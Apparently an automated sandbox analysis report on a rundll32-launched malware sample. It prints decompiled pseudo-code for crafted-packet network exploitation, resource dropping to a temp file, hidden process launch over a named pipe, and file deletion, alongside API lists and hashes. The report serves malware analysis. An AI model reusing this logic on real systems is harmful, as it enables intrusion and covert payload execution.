                                                                                                                                                                                        • recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B2697
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,007B471C,?,?,?,?,?), ref: 007B26BF
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,007B471C,?,?,?,?,?), ref: 007B26C6
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,007B471C,?,?,?,?,?), ref: 007B26CF
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B26D6
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B26DF
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B26E6
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,007B471C,?,?,?,?,?), ref: 007B26F1
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B26F8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Free$Allocrand$htonsmemcpysend$Allocaterecv
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 3232356791-3175316637
                                                                                                                                                                                        • Opcode ID: e344fa0432be51431c8fa20c006dadf4259aa01b234a4248b33b763804c4c5b9
                                                                                                                                                                                        • Instruction ID: 69c27e33b27ef28526efebf5e7cb2d08a889db63e203ce23cafa9034881b3540
                                                                                                                                                                                        • Opcode Fuzzy Hash: e344fa0432be51431c8fa20c006dadf4259aa01b234a4248b33b763804c4c5b9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0571B371501346EBDB249FA4CC49FDA7BA4FF48714F048169FA049B692E7B8DC11CB68
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 186 7b21dc-7b2205 GetProcessHeap HeapAlloc 187 7b233b-7b2341 186->187 188 7b220b-7b221c GetProcessHeap HeapAlloc 186->188 189 7b232c-7b233a GetProcessHeap 188->189 190 7b2222-7b225d htons send 188->190 189->187 191 7b2263-7b2279 recv 190->191 192 7b2320-7b2325 GetProcessHeap 190->192 191->192 194 7b227f-7b2286 191->194 192->189 194->192 195 7b228c-7b22b1 memset GetProcessHeap HeapAlloc 194->195 195->192 196 7b22b3-7b22e2 htons send 195->196 197 7b2311-7b231d GetProcessHeap 196->197 198 7b22e4-7b22fa recv 196->198 197->192 198->197 199 7b22fc-7b2300 198->199 199->197 200 7b2302-7b230d 199->200 200->197
                                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                                        			E007B21DC(intOrPtr _a4, void** _a8, void* _a12) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                        				short _t44;
                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                        				signed int _t57;
                                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                        				void* _t74;
                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t35 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v12 = _t35;
                                                                                                                                                                                        				if(_t35 == 0) {
                                                                                                                                                                                        					L13:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t66 = HeapAlloc(GetProcessHeap(), 8, 0x2d);
                                                                                                                                                                                        				_v16 = _t66;
                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                        					L12:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t57 = 9;
                                                                                                                                                                                        				_t42 = memcpy(_t66,  *_a8, _t57 << 2);
                                                                                                                                                                                        				__imp__#9(0x29);
                                                                                                                                                                                        				_t77 = _v16;
                                                                                                                                                                                        				 *(_t77 + 2) = _t42;
                                                                                                                                                                                        				_t44 =  *_a12;
                                                                                                                                                                                        				 *((char*)(_t77 + 8)) = 4;
                                                                                                                                                                                        				 *((char*)(_t77 + 0x24)) = 3;
                                                                                                                                                                                        				 *((short*)(_t77 + 0x25)) = _t44;
                                                                                                                                                                                        				__imp__#19(_a4, _t77, 0x2d, 0); // executed
                                                                                                                                                                                        				if(_t44 > 0) {
                                                                                                                                                                                        					__imp__#16(_a4, _v12, 0xffff, 0); // executed
                                                                                                                                                                                        					if(_t44 > 0) {
                                                                                                                                                                                        						_t47 = _v12;
                                                                                                                                                                                        						if( *((intOrPtr*)(_t47 + 9)) == 0) {
                                                                                                                                                                                        							 *_a12 = 0;
                                                                                                                                                                                        							memset(_t47, 0, 0xffff);
                                                                                                                                                                                        							_t50 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                                                        							_a12 = _t50;
                                                                                                                                                                                        							if(_t50 != 0) {
                                                                                                                                                                                        								_t60 = 9;
                                                                                                                                                                                        								_t51 = memcpy(_t50,  *_a8, _t60 << 2);
                                                                                                                                                                                        								__imp__#9(0x23);
                                                                                                                                                                                        								_t79 = _a12;
                                                                                                                                                                                        								 *(_t79 + 2) = _t51;
                                                                                                                                                                                        								 *((char*)(_t79 + 8)) = 0x71;
                                                                                                                                                                                        								__imp__#19(_a4, _t79, 0x27, 0);
                                                                                                                                                                                        								if(_t51 > 0) {
                                                                                                                                                                                        									_t74 = _v12;
                                                                                                                                                                                        									__imp__#16(_a4, _t74, 0xffff, 0);
                                                                                                                                                                                        									if(_t51 > 0 &&  *((intOrPtr*)(_t74 + 9)) == 0) {
                                                                                                                                                                                        										 *((short*)( *_a8 + 0x1c)) = 0;
                                                                                                                                                                                        										_v5 = 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        								HeapFree(GetProcessHeap(), 8, _t79);
                                                                                                                                                                                        								_t77 = _v16;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _t77);
                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                        			}



















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,74654F20,?,?,?,?,?,?,?,?), ref: 007B21F5
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B21FE
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 007B2210
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B2213
                                                                                                                                                                                        • htons.WS2_32(00000029), ref: 007B222E
                                                                                                                                                                                        • send.WS2_32(?,?,0000002D,00000000), ref: 007B2255
                                                                                                                                                                                        • recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B2271
                                                                                                                                                                                        • memset.MSVCRT ref: 007B2297
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000027), ref: 007B22A3
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B22A6
                                                                                                                                                                                        • htons.WS2_32(00000023), ref: 007B22C1
                                                                                                                                                                                        • send.WS2_32(?,?,00000027,00000000), ref: 007B22DA
                                                                                                                                                                                        • recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B22F2
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B2314
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B2317
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B2323
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B2326
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B2331
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B2334
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFree$htonsrecvsend$memset
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 821554539-3175316637
                                                                                                                                                                                        • Opcode ID: a90fa31bd2c04184dffd3d8429804829b02606aa4a3881387279d55b19b10ae9
                                                                                                                                                                                        • Instruction ID: 9c760ab5c2c29cbcb22cfa03a4f89f7d772ec1cae46543704956c0c9d39572ee
                                                                                                                                                                                        • Opcode Fuzzy Hash: a90fa31bd2c04184dffd3d8429804829b02606aa4a3881387279d55b19b10ae9
                                                                                                                                                                                        • Instruction Fuzzy Hash: C1418C35A0034AFFEB209FA5DC0AF9E7BA4FF49750F008055F9489B291EA78D905CB65
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        control_flow_graph 202 7b7146-7b7181 call 7ba760 GetCurrentProcess call 7b6f7c call 7b8313 209 7b7339-7b733b 202->209 210 7b7187 202->210 211 7b7189-7b719e 210->211 211->211 212 7b71a0-7b71b2 GetTempFileNameW 211->212 213 7b7318-7b7320 212->213 214 7b71b8-7b71d0 CoCreateGuid 212->214 215 7b7328-7b7332 213->215 216 7b7322-7b7326 213->216 217 7b7317 214->217 218 7b71d6-7b71e9 StringFromCLSID 214->218 215->209 216->215 216->216 217->213 218->217 219 7b71ef-7b7203 call 7b6faf 218->219 223 7b7209-7b7241 wsprintfW CreateThread 219->223 224 7b730c-7b7315 CoTaskMemFree 219->224 225 7b72dc-7b72e5 223->225 226 7b7247-7b72ae memset wsprintfW CreateProcessW 223->226 224->217 229 7b72ed-7b7306 call 7b6faf DeleteFileW 225->229 230 7b72e7-7b72eb 225->230 227 7b72d3-7b72d6 CloseHandle 226->227 228 7b72b0-7b72cd WaitForSingleObject call 7b6cc8 TerminateThread 226->228 227->225 228->227 229->224 230->229 230->230
                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                        			E007B7146(void* __ecx, void* __esi) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v52;
                                                                                                                                                                                        				struct _STARTUPINFOW _v120;
                                                                                                                                                                                        				short _v1680;
                                                                                                                                                                                        				void _v3728;
                                                                                                                                                                                        				short _v5776;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                        				long* _t60;
                                                                                                                                                                                        				char _t62;
                                                                                                                                                                                        				char* _t64;
                                                                                                                                                                                        				char* _t66;
                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                        				char* _t73;
                                                                                                                                                                                        				int _t90;
                                                                                                                                                                                        				long _t95;
                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                        				intOrPtr _t103;
                                                                                                                                                                                        				intOrPtr _t104;
                                                                                                                                                                                        				void* _t105;
                                                                                                                                                                                        				int _t109;
                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                        				E007BA760(0x168c);
                                                                                                                                                                                        				_t95 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_t7 = (0 | E007B6F7C(_t99, GetCurrentProcess()) != 0x00000000) + 1; // 0x1, executed
                                                                                                                                                                                        				_t56 = E007B8313(_t7,  &_v8,  &_v12); // executed
                                                                                                                                                                                        				if(_t56 != 0) {
                                                                                                                                                                                        					_t57 = 0;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t8 = _t57 + L"C:\\Windows\\"; // 0x3a0043
                                                                                                                                                                                        						_t102 =  *_t8 & 0x0000ffff;
                                                                                                                                                                                        						 *(_t114 + _t57 - 0x68c) = _t102;
                                                                                                                                                                                        						_t57 = _t57 + 2;
                                                                                                                                                                                        					} while (_t102 != 0);
                                                                                                                                                                                        					_t59 = GetTempFileNameW( &_v1680, 0, 0,  &_v1680); // executed
                                                                                                                                                                                        					if(_t59 == 0) {
                                                                                                                                                                                        						L16:
                                                                                                                                                                                        						_t103 = _v12;
                                                                                                                                                                                        						_t60 = _v8;
                                                                                                                                                                                        						if(_t103 == _t95) {
                                                                                                                                                                                        							L18:
                                                                                                                                                                                        							_t62 = RtlFreeHeap(GetProcessHeap(), _t95, _v8); // executed
                                                                                                                                                                                        							return _t62;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							L17:
                                                                                                                                                                                        							 *_t60 = _t95;
                                                                                                                                                                                        							_t60 =  &(_t60[0]);
                                                                                                                                                                                        							_t103 = _t103 - 1;
                                                                                                                                                                                        						} while (_t103 != 0);
                                                                                                                                                                                        						goto L18;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v36 = 0;
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					_t64 =  &_v36;
                                                                                                                                                                                        					__imp__CoCreateGuid(_t64, _t105); // executed
                                                                                                                                                                                        					if(_t64 < 0) {
                                                                                                                                                                                        						L15:
                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t66 =  &_v36;
                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                        					__imp__StringFromCLSID(_t66,  &_v16); // executed
                                                                                                                                                                                        					if(_t66 < 0) {
                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t68 = E007B6FAF(_v12,  &_v1680, _v8); // executed
                                                                                                                                                                                        					if(_t68 == 0) {
                                                                                                                                                                                        						L14:
                                                                                                                                                                                        						__imp__CoTaskMemFree(_v16);
                                                                                                                                                                                        						_t95 = 0;
                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					wsprintfW( &_v3728, L"\\\\.\\pipe\\%ws", _v16);
                                                                                                                                                                                        					_t72 = CreateThread(0, 0, E007B6FFE,  &_v3728, 0, 0); // executed
                                                                                                                                                                                        					_v20 = _t72;
                                                                                                                                                                                        					if(_t72 != 0) {
                                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                                        						_t109 = 0x44;
                                                                                                                                                                                        						memset( &_v120, 0, _t109);
                                                                                                                                                                                        						_v120.wShowWindow = 0;
                                                                                                                                                                                        						_v120.cb = _t109;
                                                                                                                                                                                        						wsprintfW( &_v5776, L"\"%ws\" %ws",  &_v1680,  &_v3728);
                                                                                                                                                                                        						_t90 = CreateProcessW( &_v1680,  &_v5776, 0, 0, 0, 0x8000000, 0, 0,  &_v120,  &_v52); // executed
                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                        							WaitForSingleObject(_v52, 0xea60);
                                                                                                                                                                                        							E007B6CC8( *0x7c7b80);
                                                                                                                                                                                        							TerminateThread(_v20, 0); // executed
                                                                                                                                                                                        						}
                                                                                                                                                                                        						CloseHandle(_v20);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t104 = _v12;
                                                                                                                                                                                        					_t73 = _v8;
                                                                                                                                                                                        					if(_t104 == 0) {
                                                                                                                                                                                        						L13:
                                                                                                                                                                                        						E007B6FAF(_v12,  &_v1680, _v8); // executed
                                                                                                                                                                                        						DeleteFileW( &_v1680); // executed
                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							 *_t73 = 0;
                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                        							_t104 = _t104 - 1;
                                                                                                                                                                                        						} while (_t104 != 0);
                                                                                                                                                                                        						goto L13;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t56;
                                                                                                                                                                                        			}



































                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00000000,?,007B7AF8), ref: 007B7164
                                                                                                                                                                                          • Part of subcall function 007B6F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,007B7170,00000000,?,007B7AF8), ref: 007B6F8E
                                                                                                                                                                                          • Part of subcall function 007B6F7C: GetProcAddress.KERNEL32(00000000), ref: 007B6F95
                                                                                                                                                                                          • Part of subcall function 007B8313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 007B832A
                                                                                                                                                                                          • Part of subcall function 007B8313: LoadResource.KERNEL32(00000000), ref: 007B8341
                                                                                                                                                                                          • Part of subcall function 007B8313: LockResource.KERNEL32(00000000), ref: 007B8350
                                                                                                                                                                                          • Part of subcall function 007B8313: SizeofResource.KERNEL32(00000000), ref: 007B8368
                                                                                                                                                                                          • Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 007B8384
                                                                                                                                                                                          • Part of subcall function 007B8313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007B838D
                                                                                                                                                                                          • Part of subcall function 007B8313: memcpy.MSVCRT ref: 007B839C
                                                                                                                                                                                          • Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 007B83B9
                                                                                                                                                                                          • Part of subcall function 007B8313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B83BC
                                                                                                                                                                                          • Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 007B840A
                                                                                                                                                                                          • Part of subcall function 007B8313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B840D
                                                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,007B7AF8), ref: 007B71AA
                                                                                                                                                                                        • CoCreateGuid.OLE32(?,746543E0,?,007B7AF8), ref: 007B71C8
                                                                                                                                                                                        • StringFromCLSID.OLE32(?,?,?,007B7AF8), ref: 007B71E1
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B721F
                                                                                                                                                                                        • CreateThread.KERNELBASE ref: 007B7236
                                                                                                                                                                                        • memset.MSVCRT ref: 007B7259
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B7281
                                                                                                                                                                                        • CreateProcessW.KERNELBASE ref: 007B72A6
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 007B72B8
                                                                                                                                                                                          • Part of subcall function 007B6CC8: EnterCriticalSection.KERNEL32(?,007B7B03), ref: 007B6CCD
                                                                                                                                                                                          • Part of subcall function 007B6CC8: InterlockedExchange.KERNEL32(?,00000001), ref: 007B6CD9
                                                                                                                                                                                          • Part of subcall function 007B6CC8: LeaveCriticalSection.KERNEL32(?), ref: 007B6CE0
                                                                                                                                                                                        • TerminateThread.KERNELBASE(?,00000000), ref: 007B72CD
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B72D6
                                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?), ref: 007B7306
                                                                                                                                                                                        • CoTaskMemFree.OLE32(?,?,?,?,007B7AF8), ref: 007B730F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,007B7AF8), ref: 007B732C
                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,?,007B7AF8), ref: 007B7333
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Resource$CreateFree$AllocateCriticalFileHandleSectionThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveLoadLockModuleNameObjectProcSingleSizeofStringTaskTempTerminateWaitmemcpymemset
                                                                                                                                                                                        • String ID: Oet Uet0Xet$"%ws" %ws$\\.\pipe\%ws
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

[Control-flow graph of function 7b46c7 (nodes 235-302, addresses 7b46c7 through 7b4ab2); API calls shown in the graph: GetProcessHeap, HeapAlloc, Sleep.]
                                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                                        			E007B46C7(void* __ecx, intOrPtr _a4, void* _a8, char _a12, signed short* _a16, char _a20) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                        				intOrPtr _t151;
                                                                                                                                                                                        				void* _t160;
                                                                                                                                                                                        				intOrPtr _t172;
                                                                                                                                                                                        				short _t173;
                                                                                                                                                                                        				signed short _t174;
                                                                                                                                                                                        				short _t202;
                                                                                                                                                                                        				short _t205;
                                                                                                                                                                                        				short _t218;
                                                                                                                                                                                        				void* _t228;
                                                                                                                                                                                        				signed int _t242;
                                                                                                                                                                                        				void* _t248;
                                                                                                                                                                                        				void* _t249;
                                                                                                                                                                                        				void* _t251;
                                                                                                                                                                                        				void _t252;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t228 = __ecx;
                                                                                                                                                                                        				_v8 = 0xc0c0c0c;
                                                                                                                                                                                        				_t251 = HeapAlloc(GetProcessHeap(), 8, 0x90);
                                                                                                                                                                                        				_v12 = _t251;
                                                                                                                                                                                        				if(_t251 == 0) {
                                                                                                                                                                                        					_v8 = 0xbadf00d;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t246 = _a16;
                                                                                                                                                                                        					 *_t251 = 0xf00d;
                                                                                                                                                                                        					_t146 = E007B2497(_t228, _a4,  &_a12,  *_a16 & 0x0000ffff,  &_v12, _a20); // executed
                                                                                                                                                                                        					if(_t146 != 0) {
                                                                                                                                                                                        						_v20 =  *(_a12 + 0x22) & 0x0000ffff;
                                                                                                                                                                                        						_t151 = E007B3449( &_v12, _a20);
                                                                                                                                                                                        						_v16 = _t151;
                                                                                                                                                                                        						if(_t151 != 0xffffffff) {
                                                                                                                                                                                        							if(_t151 != 0) {
                                                                                                                                                                                        								_t252 = 0;
                                                                                                                                                                                        								while(E007B29A2(_a4,  &_a12,  *_t246 & 0x0000ffff,  &_v12) != 0) {
                                                                                                                                                                                        									if(E007B21DC(_a4,  &_a12, _t246) == 0) {
                                                                                                                                                                                        										L12:
                                                                                                                                                                                        										_t251 = _v12;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										Sleep(0x7d0);
                                                                                                                                                                                        										if(E007B2191( &_a12, _a4, _a8, _t246) == 0) {
                                                                                                                                                                                        											_v8 = 0xbadf00d;
                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											_t252 = _t252 + 1;
                                                                                                                                                                                        											if(_t252 < 0x10) {
                                                                                                                                                                                        												_t246 = _a16;
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												goto L12;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L13;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t251 = _v12;
                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								if(E007B2E12(_a4, _a12,  *_t246 & 0x0000ffff) != 0) {
                                                                                                                                                                                        									L16:
                                                                                                                                                                                        									_v8 = 0xbadf00d;
                                                                                                                                                                                        									if(E007B317C(_t228, _a4,  &_a12,  *_t246 & 0x0000ffff) == 0) {
                                                                                                                                                                                        										goto L13;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										_t160 = HeapAlloc(GetProcessHeap(), 8, 0x100);
                                                                                                                                                                                        										_a8 = _t160;
                                                                                                                                                                                        										if(_t160 == 0) {
                                                                                                                                                                                        											goto L13;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											if(_v16 == 0) {
                                                                                                                                                                                        												L28:
                                                                                                                                                                                        												if(_a20 == 5 && 0 ==  *_t251) {
                                                                                                                                                                                        													 *((short*)(_t251 + 0x6c)) = 0x1010;
                                                                                                                                                                                        													 *((char*)(_t251 + 0x6e)) = 0x10;
                                                                                                                                                                                        													 *(_t251 + 0x50) = 0x28e0;
                                                                                                                                                                                        													 *((short*)(_t251 + 0x52)) = 0x7068;
                                                                                                                                                                                        													 *((short*)(_t251 + 0x54)) = 0x8078;
                                                                                                                                                                                        													 *((short*)(_t251 + 0x56)) = 0x9490;
                                                                                                                                                                                        													 *((char*)(_t251 + 0x58)) = 0xaa;
                                                                                                                                                                                        													 *(_t251 + 0x59) = 0xb4b8;
                                                                                                                                                                                        													 *((short*)(_t251 + 0x5c)) = 0xbaa0;
                                                                                                                                                                                        													 *((short*)(_t251 + 0x66)) = 0x4c40;
                                                                                                                                                                                        													 *((char*)(_t251 + 0x68)) = 0x68;
                                                                                                                                                                                        													 *((char*)(_t251 + 0x65)) = 0x10;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t229 =  *(_t251 + 0x6d) & 0x000000ff;
                                                                                                                                                                                        												asm("cdq");
                                                                                                                                                                                        												asm("cdq");
                                                                                                                                                                                        												_t242 = (( *(_t251 + 0x50) & 0x000000ff) + ( *(_t251 + 0x6d) & 0x000000ff) + 8) % ( *(_t251 + 0x6d) & 0x000000ff) % _t229;
                                                                                                                                                                                        												 *(_t251 + 0x8a) = _t242;
                                                                                                                                                                                        												 *((short*)(_t251 + 0x8c)) = _t242 + 0xd08;
                                                                                                                                                                                        												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x13);
                                                                                                                                                                                        												if(_t248 == 0) {
                                                                                                                                                                                        													goto L23;
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													 *((short*)(_t248 + 1)) = 0;
                                                                                                                                                                                        													 *((short*)(_t248 + 3)) = 1;
                                                                                                                                                                                        													 *((short*)(_t248 + 5)) = 0;
                                                                                                                                                                                        													 *((short*)(_t248 + 7)) = 0;
                                                                                                                                                                                        													 *((short*)(_t248 + 9)) = 0;
                                                                                                                                                                                        													 *((short*)(_t248 + 0xb)) = 1;
                                                                                                                                                                                        													_t202 = 0x34;
                                                                                                                                                                                        													 *((short*)(_t248 + 0xd)) = _t202;
                                                                                                                                                                                        													 *_t248 = 8;
